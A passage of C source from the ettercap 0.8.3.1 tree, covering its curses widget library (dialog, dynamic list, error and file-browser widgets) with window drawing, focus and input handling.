COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_dialog_border(wo); wdg_dialog_buttons(wo); /* resize the actual window and touch it */ mvwin(ww->sub, y + 2, x + 2); wresize(ww->sub, l - 4, c - 4); /* set the window color */ wbkgdset(ww->sub, COLOR_PAIR(wo->window_color)); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_dialog_border(wo); wdg_dialog_buttons(wo); /* create the inner (actual) window */ if ((ww->sub = newwin(l - 4, c - 4, y + 2, x + 2)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgdset(ww->sub, COLOR_PAIR(wo->window_color)); werase(ww->sub); redrawwin(ww->sub); } /* print the message text */ wmove(ww->sub, 0, 0); wprintw(ww->sub, ww->text); /* refresh the window */ redrawwin(ww->sub); redrawwin(ww->win); wnoutrefresh(ww->win); wnoutrefresh(ww->sub); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_dialog_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_dialog_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_dialog_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_dialog_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_dialog_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_dialog, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { wdg_set_focus(wo); /* if the mouse click was over a button */ if (wdg_dialog_mouse_move(wo, mouse) == WDG_E_SUCCESS) wdg_dialog_callback(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_LEFT: case KEY_RIGHT: wdg_dialog_move(wo, key); wdg_dialog_redraw(wo); break; case KEY_RETURN: wdg_dialog_callback(wo); break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_dialog_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dialog, ww); size_t c = wdg_get_ncols(wo); /* fill the window with color */ wbkgdset(ww->win, COLOR_PAIR(wo->window_color)); werase(ww->win); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * set the dialog attributes and text message */ void wdg_dialog_text(wdg_t *wo, size_t flags, const char *text) { WDG_WO_EXT(struct wdg_dialog, ww); int first = 1; ww->flags = flags; WDG_SAFE_STRDUP(ww->text, text); /* mark the buttons to be used */ if (ww->flags & WDG_OK) { ww->buttons[0].selected = 1; if (first) { ww->focus_button = 0; first = 0; } } if (ww->flags & WDG_YES) { ww->buttons[1].selected = 1; if (first) { ww->focus_button = 1; first = 0; } } if (ww->flags & WDG_NO) { ww->buttons[2].selected = 1; if (first) { ww->focus_button = 2; first = 0; } } if (ww->flags & WDG_CANCEL) { ww->buttons[3].selected = 1; if (first) { ww->focus_button = 3; first = 0; } } } /* * returns how many lines and cols are necessary for displaying the message */ static void wdg_dialog_get_size(struct wdg_object *wo, size_t *lines, size_t *cols) { WDG_WO_EXT(struct wdg_dialog, ww); char *p; size_t t = 0, wwtextlen; /* initialize them */ *lines = 1; *cols = 0; /* * parse the text message and find how many '\n' are present. * also calculate the longest string between two '\n' */ wwtextlen = strlen(ww->text); for (p = ww->text; p < ww->text + wwtextlen; p++) { /* count the chars */ t++; /* at the newline (or end of string) make the calculus */ if (*p == '\n' || *(p + 1) == '\0') { (*lines)++; /* cols have to be the max line length */ if (*cols < t) *cols = t; /* reset the counter */ t = 0; } } /* if there were no '\n' */ if (*cols == 0) *cols = t; if (ww->flags != WDG_NO_BUTTONS) /* add the lines for the buttons */ *lines += 2; } /* * display the dialog buttons */ static void wdg_dialog_buttons(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dialog, ww); size_t i, l, c; /* no button to be displayed */ if (ww->flags == WDG_NO_BUTTONS) return; /* get the line of the message */ wdg_dialog_get_size(wo, &l, &c); /* calculate the length of the buttons */ for (i = 0; i < WDG_DIALOG_MAX_BUTTON; i++) if (ww->buttons[i].selected) c -= strlen(ww->buttons[i].label); /* move the cursor to the right position (centered) */ wmove(ww->sub, l - 1, c / 2); /* print the buttons */ for (i = 0; i < WDG_DIALOG_MAX_BUTTON; i++) { if (ww->buttons[i].selected) { if (ww->focus_button == i) wattron(ww->sub, A_REVERSE); wprintw(ww->sub, "%s", ww->buttons[i].label); wattroff(ww->sub, A_REVERSE); } } } /* * move the focus thru menu units */ static void wdg_dialog_move(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_dialog, ww); int i = ww->focus_button; switch(key) { case KEY_RIGHT: /* move until we found a selected button */ while (!ww->buttons[++i].selected); /* if we are in the edges, set the focus to the new button */ if ( i < WDG_DIALOG_MAX_BUTTON && ww->buttons[i].selected) ww->focus_button = i; break; case KEY_LEFT: /* move until we found a selected button */ while (!ww->buttons[--i].selected); /* if we are in the edges, set the focus to the new button */ if (i >= 0 && ww->buttons[i].selected) ww->focus_button = i; break; } } /* * select the focus with a mouse event */ static int wdg_dialog_mouse_move(struct wdg_object *wo, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_dialog, ww); size_t y = wdg_get_begin_y(wo); size_t x = wdg_get_begin_x(wo); size_t i, l, c; /* get the line of the message */ wdg_dialog_get_size(wo, &l, &c); /* not on the button line */ if (mouse->y != y + 2 + l - 1) return -WDG_E_NOTHANDLED; /* calculate the length of the buttons */ for (i = 0; i < WDG_DIALOG_MAX_BUTTON; i++) if (ww->buttons[i].selected) c -= strlen(ww->buttons[i].label); /* buttons start here */ x += c / 2; for (i = 0; i < WDG_DIALOG_MAX_BUTTON; i++) { /* if the mouse is over a title */ if (mouse->x >= x && mouse->x < x + strlen(ww->buttons[i].label) ) { ww->focus_button = i; return WDG_E_SUCCESS; } /* move the pointer */ x += strlen(ww->buttons[i].label); } return -WDG_E_NOTHANDLED; } /* * destroy the dialog and * call the function associated to the button */ static void wdg_dialog_callback(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dialog, ww); void (*callback)(void); WDG_DEBUG_MSG("wdg_dialog_callback"); callback = ww->buttons[ww->focus_button].callback; wdg_destroy_object(&wo); wdg_redraw_all(); WDG_EXECUTE(callback); } /* * the user should use it to associate a callback to a button */ void wdg_dialog_add_callback(wdg_t *wo, size_t flag, void (*callback)(void)) { WDG_WO_EXT(struct wdg_dialog, ww); if (flag & WDG_OK) ww->buttons[0].callback = callback; if (flag & WDG_YES) ww->buttons[1].callback = callback; if (flag & WDG_NO) ww->buttons[2].callback = callback; if (flag & WDG_CANCEL) ww->buttons[3].callback = callback; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_dynlist.c000664 000000 000000 00000034653 13711276346 024054 0ustar00rootroot000000 000000 /* WDG -- dynamic list widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_dynlist_call { int key; void (*callback)(void *); SLIST_ENTRY(wdg_dynlist_call) next; }; struct wdg_dynlist { WINDOW *win; WINDOW *sub; void * (*func)(int mode, void *list, char **desc, size_t len); void *top; void *bottom; void *current; void (*select_callback)(void *); SLIST_HEAD(, wdg_dynlist_call) callbacks; }; /* PROTOS */ void wdg_create_dynlist(struct wdg_object *wo); static int wdg_dynlist_destroy(struct wdg_object *wo); static int wdg_dynlist_resize(struct wdg_object *wo); static int wdg_dynlist_redraw(struct wdg_object *wo); static int wdg_dynlist_get_focus(struct wdg_object *wo); static int wdg_dynlist_lost_focus(struct wdg_object *wo); static int wdg_dynlist_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_dynlist_border(struct wdg_object *wo); static void wdg_dynlist_move(struct wdg_object *wo, int key); static void wdg_dynlist_mouse(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static int wdg_dynlist_callback(struct wdg_object *wo, int key); /*******************************************/ /* * called to create a window */ void wdg_create_dynlist(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_dynlist"); /* set the callbacks */ wo->destroy = wdg_dynlist_destroy; wo->resize = wdg_dynlist_resize; wo->redraw = wdg_dynlist_redraw; wo->get_focus = wdg_dynlist_get_focus; wo->lost_focus = wdg_dynlist_lost_focus; wo->get_msg = wdg_dynlist_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_dynlist)); } /* * called to destroy a window */ static int wdg_dynlist_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dynlist, ww); struct wdg_dynlist_call *c; WDG_DEBUG_MSG("wdg_dynlist_destroy (%p)", wo); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); wbkgd(ww->sub, COLOR_PAIR(wo->screen_color)); werase(ww->sub); werase(ww->win); wnoutrefresh(ww->sub); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->sub); delwin(ww->win); /* free the callback list */ while (SLIST_FIRST(&ww->callbacks) != NULL) { c = SLIST_FIRST(&ww->callbacks); SLIST_REMOVE_HEAD(&ww->callbacks, next); WDG_SAFE_FREE(c); } WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_dynlist_resize(struct wdg_object *wo) { wdg_dynlist_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_dynlist_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dynlist, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_dynlist_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_dynlist_border(wo); /* resize the actual window and touch it */ mvwin(ww->sub, y + 2, x + 2); wresize(ww->sub, l - 4, c - 4); /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_dynlist_border(wo); /* create the inner (actual) window */ if ((ww->sub = newwin(l - 4, c - 4, y + 2, x + 2)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); werase(ww->sub); redrawwin(ww->sub); /* initialize the pointer */ wmove(ww->sub, 0, 0); scrollok(ww->sub, FALSE); } /* refresh the window */ redrawwin(ww->sub); redrawwin(ww->win); wnoutrefresh(ww->win); wnoutrefresh(ww->sub); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_dynlist_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_dynlist_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_dynlist_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_dynlist_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_dynlist_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_dynlist, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { if (wo->flags & WDG_OBJ_FOCUSED) wdg_dynlist_mouse(wo, key, mouse); else wdg_set_focus(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_UP: case KEY_DOWN: case KEY_PPAGE: case KEY_NPAGE: wdg_dynlist_move(wo, key); break; case KEY_RETURN: if (ww->current) WDG_EXECUTE(ww->select_callback, ww->current); break; /* message not handled */ default: return wdg_dynlist_callback(wo, key); break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_dynlist_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_dynlist, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * set the callback for displaying the list */ void wdg_dynlist_print_callback(wdg_t *wo, void * func(int mode, void *list, char **desc, size_t len)) { WDG_WO_EXT(struct wdg_dynlist, ww); WDG_DEBUG_MSG("wdg_dynlist_print_callback %p", func); ww->func = func; } /* * set the select callback */ void wdg_dynlist_select_callback(wdg_t *wo, void (*callback)(void *)) { WDG_WO_EXT(struct wdg_dynlist, ww); WDG_DEBUG_MSG("wdg_dynlist_select_callback %p", callback); ww->select_callback = callback; } /* * add the callback on key pressed by the user */ void wdg_dynlist_add_callback(wdg_t *wo, int key, void (*callback)(void *)) { WDG_WO_EXT(struct wdg_dynlist, ww); struct wdg_dynlist_call *c; WDG_SAFE_CALLOC(c, 1, sizeof(struct wdg_dynlist_call)); c->key = key; c->callback = callback; SLIST_INSERT_HEAD(&ww->callbacks, c, next); } /* * search for a callback and execute it */ static int wdg_dynlist_callback(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_dynlist, ww); struct wdg_dynlist_call *c; SLIST_FOREACH(c, &ww->callbacks, next) { if (c->key == key) { WDG_DEBUG_MSG("wdg_dynlist_callback"); /* execute the callback only if current is not NULL */ if (ww->current) WDG_EXECUTE(c->callback, ww->current); return WDG_E_SUCCESS; } } return -WDG_E_NOTHANDLED; } /* * refresh the list */ void wdg_dynlist_refresh(wdg_t *wo) { WDG_WO_EXT(struct wdg_dynlist, ww); size_t l = wdg_get_nlines(wo) - 4; size_t c = wdg_get_ncols(wo) - 4; size_t i = 0, found = 0; void *list, *next; char *desc; /* sanity check */ if (ww->func == NULL) return; /* erase the window */ werase(ww->sub); /* * update the top (on the first element) in two case: * top is not set * bottom is not set (to update the list over the current element) */ if (ww->top == NULL || ww->bottom == NULL) { /* retrieve the first element */ ww->top = ww->func(0, NULL, NULL, 0); } /* no elements */ if (ww->top == NULL) return; WDG_SAFE_CALLOC(desc, 100, sizeof(char)); /* no current item, set it to the first element */ if (ww->current == NULL) ww->current = ww->top; /* if the top does not exist any more, set it to the first */ if (ww->func(0, ww->top, NULL, 0) == NULL) ww->top = ww->func(0, NULL, NULL, 0); /* start from the top element */ list = ww->top; /* print all the entry until the bottom of the window */ while (list) { next = ww->func(+1, list, &desc, 99); /* dont print string longer than the window */ if (strlen(desc) > c) desc[c] = 0; /* the current item is selected */ if (ww->current == list) { wattron(ww->sub, A_REVERSE); wmove(ww->sub, i, 0); whline(ww->sub, ' ', c); wprintw(ww->sub, "%s", desc); wattroff(ww->sub, A_REVERSE); wmove(ww->sub, i+1, 0); found = 1; } else { wprintw(ww->sub, "%s\n", desc); } /* exit when the bottom is reached */ if (++i == l) { ww->bottom = list; break; } else { /* * set to null, to have the bottom set only if the list * is as long as the window */ ww->bottom = NULL; } /* move the pointer */ list = next; } /* if the current element does not exist anymore, set it to 'top' */ if (!found) ww->current = ww->top; WDG_SAFE_FREE(desc); wnoutrefresh(ww->sub); } /* * move the focus */ static void wdg_dynlist_move(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_dynlist, ww); size_t l = wdg_get_nlines(wo) - 4; size_t i = 0; void *first, *prev, *next; /* retrieve the first element of the list */ first = ww->func(0, NULL, NULL, 0); switch (key) { case KEY_UP: prev = ww->func(-1, ww->current, NULL, 0); /* we are on the first element */ if (ww->current == first) return; /* move up the list if we are on the top */ if (ww->current == ww->top) ww->top = prev; /* update the current element */ ww->current = prev; break; case KEY_DOWN: next = ww->func(+1, ww->current, NULL, 0); /* we are on the last element */ if (next == NULL) return; /* move the top if we are on the bottom (scroll the list) */ if (ww->current == ww->bottom) ww->top = ww->func(+1, ww->top, NULL, 0); /* update the current element */ ww->current = next; break; case KEY_PPAGE: while (ww->current != first) { prev = ww->func(-1, ww->current, NULL, 0); /* move up the list if we are on the top */ if (ww->current == ww->top) ww->top = prev; /* update the current element */ ww->current = prev; /* move only one page */ if (++i == l-1) break; } break; case KEY_NPAGE: while ((next = ww->func(+1, ww->current, NULL, 0)) != NULL) { /* move the top if we are on the bottom (scroll the list) */ if (ww->current == ww->bottom) { ww->top = ww->func(+1, ww->top, NULL, 0); ww->bottom = ww->func(+1, ww->bottom, NULL, 0); } /* update the current element */ ww->current = next; /* move only one page */ if (++i == l-1) break; } break; } wdg_dynlist_refresh(wo); } /* * move the focus with the mouse */ static void wdg_dynlist_mouse(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_dynlist, ww); /* we are for sure within the edges */ size_t y = wdg_get_begin_y(wo) + 2; size_t line, i = 0; void *next; /* variable currently not used */ (void) key; /* calculate which line was selected */ line = mouse->y - y; /* calculate the distance from the top */ ww->current = ww->top; while (line != 0 && (next = ww->func(+1, ww->current, NULL, 0)) != NULL) { /* update the current element */ ww->current = next; /* move until the selected line */ if (++i == line) break; } /* if double click, execute the callback */ if (mouse->event == BUTTON1_DOUBLE_CLICKED) if (ww->current) WDG_EXECUTE(ww->select_callback, ww->current); wdg_dynlist_refresh(wo); } /* * reset the focus pointer */ void wdg_dynlist_reset(wdg_t *wo) { WDG_WO_EXT(struct wdg_dynlist, ww); ww->top = NULL; ww->current = NULL; ww->bottom = NULL; wdg_dynlist_refresh(wo); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_error.c000664 000000 000000 00000003725 13711276346 023513 0ustar00rootroot000000 000000 /* WDG -- errors handling module Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define ERROR_MSG_LEN 200 /*******************************************/ /* * raise an error */ void wdg_error_msg(char *file, const char *function, int line, char *message, ...) { va_list ap; char errmsg[ERROR_MSG_LEN + 1]; /* should be enough */ int err_code; #ifdef OS_WINDOWS err_code = GetLastError(); /* Most likely not a libc error */ if (err_code == 0) err_code = errno; #else err_code = errno; #endif va_start(ap, message); vsnprintf(errmsg, ERROR_MSG_LEN, message, ap); va_end(ap); /* close the interface and display the error */ wdg_cleanup(); fprintf(stderr, "WDG ERROR : %d, %s\n[%s:%s:%d]\n\n %s \n\n", err_code, strerror(err_code), file, function, line, errmsg ); exit(-err_code); } /* * used in sanity check * it represent a BUG in the software */ void wdg_bug(char *file, const char *function, int line, char *message) { /* close the interface and display the error */ wdg_cleanup(); fprintf(stderr, "\n\nWDG BUG at [%s:%s:%d]\n\n %s \n\n", file, function, line, message ); exit(-666); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_file.c000664 000000 000000 00000035715 13711276346 023305 0ustar00rootroot000000 000000 /* WDG -- file widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #ifndef HAVE_SCANDIR #include #endif /* GLOBALS */ struct wdg_file_handle { WINDOW *win; MENU *m; WINDOW *mwin; ITEM **items; size_t nitems; int nlist; size_t x, y; struct dirent **namelist; char curpath[PATH_MAX]; char initpath[PATH_MAX]; void (*callback)(const char *path, char *file); }; /* PROTOS */ void wdg_create_file(struct wdg_object *wo); static int wdg_file_destroy(struct wdg_object *wo); static int wdg_file_resize(struct wdg_object *wo); static int wdg_file_redraw(struct wdg_object *wo); static int wdg_file_get_focus(struct wdg_object *wo); static int wdg_file_lost_focus(struct wdg_object *wo); static int wdg_file_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_file_borders(struct wdg_object *wo); static void wdg_file_menu_destroy(struct wdg_object *wo); static void wdg_file_menu_create(struct wdg_object *wo); static int wdg_file_virtualize(int key); static int wdg_file_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_file_callback(struct wdg_object *wo, const char *path, char *file); /*******************************************/ /* * called to create the file dialog */ void wdg_create_file(struct wdg_object *wo) { struct wdg_file_handle *ww; WDG_DEBUG_MSG("wdg_create_file"); /* set the callbacks */ wo->destroy = wdg_file_destroy; wo->resize = wdg_file_resize; wo->redraw = wdg_file_redraw; wo->get_focus = wdg_file_get_focus; wo->lost_focus = wdg_file_lost_focus; wo->get_msg = wdg_file_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_file_handle)); /* * remember the initial path. * this has to be restored after the file is selected */ ww = (struct wdg_file_handle *)wo->extend; getcwd(ww->initpath, PATH_MAX); /* default geometry */ ww->x = 50; ww->y = 18; } /* * called to destroy the file dialog */ static int wdg_file_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_file_handle, ww); WDG_DEBUG_MSG("wdg_file_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); wnoutrefresh(ww->win); /* destroy the internal menu */ wdg_file_menu_destroy(wo); /* dealloc the structures */ delwin(ww->win); /* restore the initial working directory */ if (chdir(ww->initpath) == -1) WARN_MSG("chdir failed: %s", strerror(errno)); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize the file dialog */ static int wdg_file_resize(struct wdg_object *wo) { wdg_file_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw the file dialog */ static int wdg_file_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_file_handle, ww); size_t c, l, x, y; WDG_DEBUG_MSG("wdg_file_redraw"); /* default dimentions */ wo->x1 = (current_screen.cols - ww->x) / 2; wo->y1 = (current_screen.lines - ww->y) / 2; wo->x2 = -wo->x1; wo->y2 = -wo->y1; c = wdg_get_ncols(wo); l = wdg_get_nlines(wo); x = wdg_get_begin_x(wo); y = wdg_get_begin_y(wo); /* deal with rouding */ if (l != ww->y) l = ww->y; if (c != ww->x) c = ww->x; /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); /* destroy the file list */ wdg_file_menu_destroy(wo); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wbkgd(ww->win, COLOR_PAIR(wo->window_color)); werase(ww->win); /* create the file list */ wdg_file_menu_create(wo); touchwin(ww->win); wdg_file_borders(wo); /* the first time we have to allocate the window */ } else { /* create the menu window (fixed dimensions) */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* create the file list */ wdg_file_menu_create(wo); /* set the window color */ wbkgd(ww->win, COLOR_PAIR(wo->window_color)); redrawwin(ww->win); /* draw the titles */ wdg_file_borders(wo); /* no scrolling */ scrollok(ww->win, FALSE); } /* refresh the window */ touchwin(ww->win); wnoutrefresh(ww->win); touchwin(ww->mwin); wnoutrefresh(ww->mwin); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the file dialog gets the focus */ static int wdg_file_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_file_redraw(wo); return WDG_E_SUCCESS; } /* * called when the file dialog looses the focus */ static int wdg_file_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_file_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the file dialog is focused */ static int wdg_file_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_file_handle, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { wdg_set_focus(wo); /* pass it to the menu */ if (wdg_file_driver(wo, key, mouse) != WDG_E_SUCCESS) wdg_file_redraw(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_RETURN: case KEY_DOWN: case KEY_UP: case KEY_PPAGE: case KEY_NPAGE: /* move only if focused */ if (wo->flags & WDG_OBJ_FOCUSED) { if (wdg_file_driver(wo, key, mouse) != WDG_E_SUCCESS) wdg_file_redraw(wo); } else return -WDG_E_NOTHANDLED; break; case KEY_ESC: case CTRL('Q'): wdg_destroy_object(&wo); wdg_redraw_all(); break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the file dialog borders */ static void wdg_file_borders(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_file_handle, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * stransform keys into menu commands */ static int wdg_file_virtualize(int key) { switch (key) { case KEY_RETURN: case KEY_EXIT: return (MAX_COMMAND + 1); case KEY_NPAGE: return (REQ_SCR_DPAGE); case KEY_PPAGE: return (REQ_SCR_UPAGE); case KEY_DOWN: return (REQ_NEXT_ITEM); case KEY_UP: return (REQ_PREV_ITEM); default: if (key != KEY_MOUSE) beep(); return (key); } } /* * sends command to the menu */ static int wdg_file_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_file_handle, ww); int c; struct stat buf; /* variable currently not used */ (void) mouse; c = menu_driver(ww->m, wdg_file_virtualize(key) ); /* skip non selectable items */ if ( !(item_opts(current_item(ww->m)) & O_SELECTABLE) ) c = menu_driver(ww->m, wdg_file_virtualize(key) ); /* one item has been selected */ if (c == E_UNKNOWN_COMMAND) { /* the item is not selectable (probably selected with mouse) */ if ( !(item_opts(current_item(ww->m)) & O_SELECTABLE) ) return WDG_E_SUCCESS; stat(item_name(current_item(ww->m)), &buf); /* if it is a directory, change to it */ if (S_ISDIR(buf.st_mode)) { if (chdir(item_name(current_item(ww->m))) == -1) WARN_MSG("chdir failed: %s", strerror(errno)); return -WDG_E_NOTHANDLED; } else { /* invoke the callback and return */ wdg_file_callback(wo, ww->curpath, (char *)item_name(current_item(ww->m))); return WDG_E_SUCCESS; } } wnoutrefresh(ww->mwin); return WDG_E_SUCCESS; } 